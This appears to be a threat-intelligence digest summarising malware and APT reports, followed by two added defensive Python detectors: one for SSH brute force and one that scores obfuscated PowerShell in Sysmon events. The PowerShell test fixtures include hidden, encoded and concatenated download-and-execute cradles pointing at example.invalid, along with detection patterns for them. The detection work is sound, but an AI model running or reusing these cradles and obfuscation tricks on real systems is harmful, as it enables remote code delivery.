Agentic AI in the SOC – Dawn of Autonomous Alert Triage
Summary: This article explores the transformative power of Agentic AI in Security Operations Centers (SOCs), emphasizing its autonomy compared to traditional Assistant AI tools. It highlights how Agentic AI automates critical triage and investigation tasks, reducing analyst fatigue while improving operational efficiency and cost-effectiveness. The article also offers key considerations for evaluating Agentic AI solutions to enhance security operations.…
Vidar Stealer: Revealing A New Deception Strategy
Vidar Stealer is a potent information stealer that has evolved steadily since it first appeared in 2018 and has increasingly targeted gamers. It was recently distributed through a game listed on Steam, abusing the trust users place in a popular platform. Notably, the abuse of a legitimate Sysinternals utility, BGInfo, to cloak malicious activity marks a significant shift in tradecraft and underlines the need to monitor the integrity of trusted software.…

Summary: The video discusses a live training session for the Just Hacking community, highlighting new courses and features, including VPN support for accessing a new lab environment. The session introduces a special guest, Anton, who presents the “Constructing Defense” course, focusing on teaching cybersecurity principles through real-world scenarios and hands-on lab exercises.…
AustralianSuper, Rest, ART Among Victims in Widespread Superannuation Cyberattacks
Summary: A series of cyberattacks has targeted some of Australia’s largest superannuation funds, compromising over 20,000 member accounts, with the most significant impact reported by AustralianSuper and Australian Retirement Trust. In response, the affected funds have implemented immediate protective measures and are working closely with national authorities to secure member information.…
Outlaw Linux Malware: Persistent, Unsophisticated, and Surprisingly Effective — Elastic Security Labs
OUTLAW is a persistent, auto-propagating coinminer that utilizes simple techniques such as SSH brute-forcing and modification of commodity miners for infection and persistence. By deploying a honeypot, researchers gained insights into how OUTLAW operates, revealing the malware’s ability to maintain control and expand its botnet with basic tactics.…
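OUTLAW's initial access is plain SSH password guessing, so the detection a SOC wants is the simple one: a burst of `Failed password` events from a single source followed by an `Accepted` login from that same source, which is the moment the miner lands. The following is an added example, not code from Elastic Security Labs or the OUTLAW write-up. The sshd log lines are constructed, and the 5-failures-in-60-seconds threshold and the year used to complete the year-less syslog timestamps are assumptions.

```python
"""Sliding-window SSH brute-force detector over sshd syslog lines.

Added example (not from the Elastic article). The auth.log lines below are
constructed; the threshold, window and year are assumptions.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# OpenSSH auth messages as syslog writes them: no year, day may be space-padded.
SSHD_LINE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port \d+ ssh2"
)

# Constructed sample: one source hammers root/admin/oracle/test and then gets in,
# one legitimate user mistypes three times over ten minutes, one key-based login.
SAMPLE_AUTH_LOG = [
    "Apr  3 02:14:01 web01 sshd[2201]: Failed password for root from 198.51.100.20 port 40112 ssh2",
    "Apr  3 02:14:03 web01 sshd[2203]: Failed password for invalid user admin from 198.51.100.20 port 40118 ssh2",
    "Apr  3 02:14:06 web01 sshd[2205]: Failed password for invalid user oracle from 198.51.100.20 port 40124 ssh2",
    "Apr  3 02:14:09 web01 sshd[2207]: Failed password for root from 198.51.100.20 port 40130 ssh2",
    "Apr  3 02:14:12 web01 sshd[2209]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=198.51.100.20",
    "Apr  3 02:14:13 web01 sshd[2209]: Failed password for invalid user test from 198.51.100.20 port 40136 ssh2",
    "Apr  3 02:14:17 web01 sshd[2211]: Failed password for root from 198.51.100.20 port 40142 ssh2",
    "Apr  3 02:14:40 web01 sshd[2215]: Accepted password for root from 198.51.100.20 port 40150 ssh2",
    "Apr  3 02:20:11 web01 sshd[2301]: Failed password for alice from 203.0.113.9 port 50211 ssh2",
    "Apr  3 02:25:30 web01 sshd[2305]: Failed password for alice from 203.0.113.9 port 50219 ssh2",
    "Apr  3 02:31:02 web01 sshd[2310]: Failed password for alice from 203.0.113.9 port 50230 ssh2",
    "Apr  3 02:31:20 web01 sshd[2312]: Accepted password for alice from 203.0.113.9 port 50234 ssh2",
    "Apr  3 03:00:00 web01 sshd[2400]: Accepted publickey for deploy from 192.0.2.5 port 60001 ssh2",
]


def detect(lines, threshold=5, window=timedelta(seconds=60), year=2025):
    """Return ({ip: time first flagged}, [(ip, user, time)]).

    An IP is flagged when `threshold` failures fall inside `window`; any
    subsequent Accepted login from a flagged IP is reported as a likely
    compromise. Lines must be in time order, as a log file is.
    """
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    flagged = {}
    compromises = []
    for line in lines:
        m = SSHD_LINE.match(line)
        if not m:                    # pam_unix noise and other messages
            continue
        # syslog carries no year; the caller supplies one (assumption: 2025)
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        ip, user = m["ip"], m["user"]
        if m["result"] == "Failed":
            q = failures[ip]
            q.append(ts)
            while q and ts - q[0] > window:   # slide the window forward
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = ts
        elif ip in flagged:          # success after a brute-force burst
            compromises.append((ip, user, ts))
    return flagged, compromises


if __name__ == "__main__":
    brute, owned = detect(SAMPLE_AUTH_LOG)
    for ip, ts in brute.items():
        print(f"brute force from {ip}, flagged at {ts:%H:%M:%S}")
    for ip, user, ts in owned:
        print(f"likely compromise: {user} from {ip} at {ts:%H:%M:%S}")
```

Three mistypes over ten minutes from 203.0.113.9 never fill the window, so alice's eventual login is not reported; the six guesses in sixteen seconds from 198.51.100.20 are, and the `root` login that follows is what an OUTLAW-style operator needs before dropping the miner.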
Analysis of Konni APT Campaign Impersonating the National Police Agency and the National Human Rights Commission
In recent spear-phishing attempts, the Konni APT has impersonated South Korean government bodies such as the National Human Rights Commission and the National Police Agency, using lures about alleged human rights violations and hacking incidents to pressure recipients into opening the attachments. The attacks rely on deception to get malicious files onto the host, notably LNK shortcuts and AutoIt scripts.…

Summary: The video discusses an interview with Rob Allen, Chief Product Officer at ThreatLocker, focusing on the integration of AI in security products and the challenges in the cybersecurity landscape. It addresses recent vulnerabilities in Microsoft systems and various security updates required to enhance protection against potential attacks.…
Threat actors leverage tax season to deploy tax-themed phishing campaigns
As the U.S. tax season approaches, Microsoft has observed an increase in phishing campaigns that use tax-related themes to steal sensitive information and deploy malware. The campaigns use URL shorteners, QR codes, and legitimate file-hosting services to evade detection. The reported threats include credential phishing via the RaccoonO365 phishing-as-a-service kit and malware families such as Remcos and Latrodectus.…
My book on Cyber Threat Intel, that never quite made it as a book, Chapter 1.1
This content explores the significance of Cyber Threat Intelligence (CTI) in improving organizational security and understanding the threat landscape. It delves into the motivations of various types of threat actors, their tactics, and how to effectively mitigate risks. The goal is to provide a comprehensive guide that enhances awareness and proactive measures against cyber threats.…
BYOVD Reloaded: Abusing a New Driver to Kill EDR
The article analyzes a Qilin ransomware intrusion in which the operators used a bring-your-own-vulnerable-driver (BYOVD) technique to disable Endpoint Detection and Response (EDR) tooling. The analysis examines the abuse of a lesser-known driver, TPwSav.sys, within a ransomware-as-a-service operation, and covers the weaknesses exploited, the attack chain, and the response by Blackpoint’s Security Operations Center (SOC).…
SVC New Stealer on the Horizon
SvcStealer 2025 is a sophisticated information-stealing malware delivered through spear phishing emails. It captures sensitive data from victims, including credentials and cryptocurrency wallet information, and sends it to a command and control (C2) server. With a focus on evading detection, it deletes traces of its activities and can potentially download additional malware.…

Summary: The video discusses an upcoming online cyber security conference called Continuum con, which offers hands-on workshops focused on blue team cyber security defense. Unlike traditional conferences filled with dull presentations, attendees will actively engage in practical exercises across various topics, providing continuous education even after the conference ends.…
Lotus Blossom, also known as Lotus Panda, is a sophisticated Chinese APT group that has conducted cyber espionage for over a decade. It has recently refined its tradecraft by deploying new Sagerunex backdoor variants that use third-party cloud services and social media for command and control. This article examines the group’s tactics, techniques, and procedures, detailing its operational framework and the challenges of defending against such a persistent threat.…
Detecting Obfuscated PowerShell Attacks Using Sysmon and the ELK Stack
This article describes a lab project focused on detecting obfuscated PowerShell attacks using Sysmon, Winlogbeat, and the ELK stack. It highlights the challenges presented by attackers utilizing PowerShell and command-line obfuscation, aiming to provide defenders with hands-on experience in threat detection. The lab teaches students to recognize malicious activities, log telemetry, and utilize practical tools for cybersecurity defenses.…
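The point of the lab is that obfuscation has a signature of its own, and that telemetry only helps if the detection looks at the command line the way an obfuscator builds it. The following is an added example, not the lab's code: a scoring pass over constructed Sysmon Event ID 1 records in the `winlog.event_data` shape Winlogbeat ships to Elasticsearch. The indicator weights, the threshold of 5, the field layout and every command line are assumptions made for illustration. Decoding the `-EncodedCommand` payload before matching is what exposes the download cradle in the second event; without it the raw line scores only on the hidden window.

```python
"""Heuristic scoring of PowerShell command lines from Sysmon Event ID 1.

Added example, not the lab's code. Records mimic Winlogbeat's
winlog.event_data layout; every command line is constructed, and the
indicator weights and threshold are assumptions.
"""
import base64
import re
from dataclasses import dataclass
from typing import List, Optional

POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
B64_TOKEN = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

# (name, pattern, minimum hits, weight): run over the raw command line and,
# separately, over any decoded -EncodedCommand payload.
TEXT_INDICATORS = [
    ("invoke_expression", re.compile(r"(?i)\biex\b|invoke-expression"), 1, 3),
    ("download_cradle", re.compile(r"(?i)downloadstring|downloadfile|net\.webclient|invoke-webrequest|\biwr\b"), 1, 3),
    ("string_concat", re.compile(r"(?:'[^']*'\s*\+\s*){2,}"), 1, 2),   # 'Down'+'loadStr'+...
    ("char_cast", re.compile(r"(?i)\[char\]\s*\(?\d+"), 2, 2),         # [char]73,[char]69,...
    ("join_or_reverse", re.compile(r"(?i)-join\b|\[array\]::reverse"), 1, 2),
    ("backtick_escape", re.compile(r"(?i)`[a-z]"), 2, 2),              # i`e`x
    ("hidden_window", re.compile(r"(?i)-w(?:in(?:dowstyle)?)?\s+hidden"), 1, 1),
]


def mixed_case(token: str) -> bool:
    """True for tokens like PoWeRsHeLl: case flips at least every other letter."""
    word = re.sub(r"(?i)\.exe$", "", token.lstrip("-\"'&("))
    if not word.isalpha() or len(word) < 6:
        return False
    flips = sum(1 for a, b in zip(word, word[1:]) if a.isupper() != b.isupper())
    return flips >= len(word) // 2


def extract_encoded_payload(cmdline: str) -> Optional[str]:
    """Decode the argument of -EncodedCommand, any prefix of it (-e, -en, -enc) or -ec."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        name = tok.lstrip("-/").lower()
        if not tok.startswith("-") or not name:
            continue
        if ("encodedcommand".startswith(name) or name == "ec") and B64_TOKEN.match(tokens[i + 1]):
            try:  # powershell.exe expects the payload as base64 of UTF-16LE text
                return base64.b64decode(tokens[i + 1]).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


@dataclass
class Verdict:
    score: int
    indicators: List[str]
    decoded: Optional[str]


def score_command_line(cmdline: str) -> Verdict:
    hits = []
    decoded = extract_encoded_payload(cmdline)
    if decoded is not None:
        hits.append(("encoded_command", 4))
    for origin, text in (("raw", cmdline), ("decoded", decoded or "")):
        if not text:
            continue
        for name, pattern, min_hits, weight in TEXT_INDICATORS:
            if len(pattern.findall(text)) >= min_hits:
                hits.append((f"{name}@{origin}", weight))
        words = [t for t in text.split() if not B64_TOKEN.match(t)]  # skip the base64 blob itself
        if any(mixed_case(t) for t in words):
            hits.append((f"case_mixing@{origin}", 2))
    return Verdict(sum(w for _, w in hits), [n for n, _ in hits], decoded)


def triage(events, threshold: int = 5):
    """Return [(ProcessId, Verdict)] for PowerShell launches scoring >= threshold."""
    flagged = []
    for ev in events:
        data = ev["winlog"]["event_data"]
        image = data.get("Image", "").rsplit("\\", 1)[-1].lower()
        cmdline = data.get("CommandLine", "")
        if image not in POWERSHELL_IMAGES and "powershell" not in cmdline.lower():
            continue
        verdict = score_command_line(cmdline)
        if verdict.score >= threshold:
            flagged.append((data["ProcessId"], verdict))
    return flagged


def _encode(script: str) -> str:
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _event(pid, image, cmdline):
    return {"winlog": {"event_id": 1, "event_data": {"ProcessId": pid, "Image": image, "CommandLine": cmdline}}}


PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [  # constructed: one benign launch, three obfuscated ones, one non-PowerShell process
    _event("4120", PS_IMAGE, r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\inventory.ps1"),
    _event("5008", PS_IMAGE, "powershell.exe -NoP -W Hidden -Enc "
           + _encode("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')")),
    _event("5124", PS_IMAGE, "powershell.exe -c \"$m='Down'+'loadStr'+'ing'; "
           "(New-Object Net.WebClient).$m('http://example.invalid/x')\""),
    _event("5300", PS_IMAGE, r'PoWeRsHeLl.exe -NoP -c "& (-join([char]73,[char]69,[char]88)) (gc C:\Users\Public\s.txt)"'),
    _event("5410", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
]

if __name__ == "__main__":
    for pid, v in triage(SAMPLE_EVENTS):
        print(pid, v.score, v.indicators)
```

The scheduled-task launch scores zero, while the concatenation, the `[char]`/`-join` assembly and the encoded cradle all cross the threshold for different reasons; in the ELK lab the same logic maps onto a query over `winlog.event_data.CommandLine`, with the decoding step done in an ingest pipeline or a scripted field.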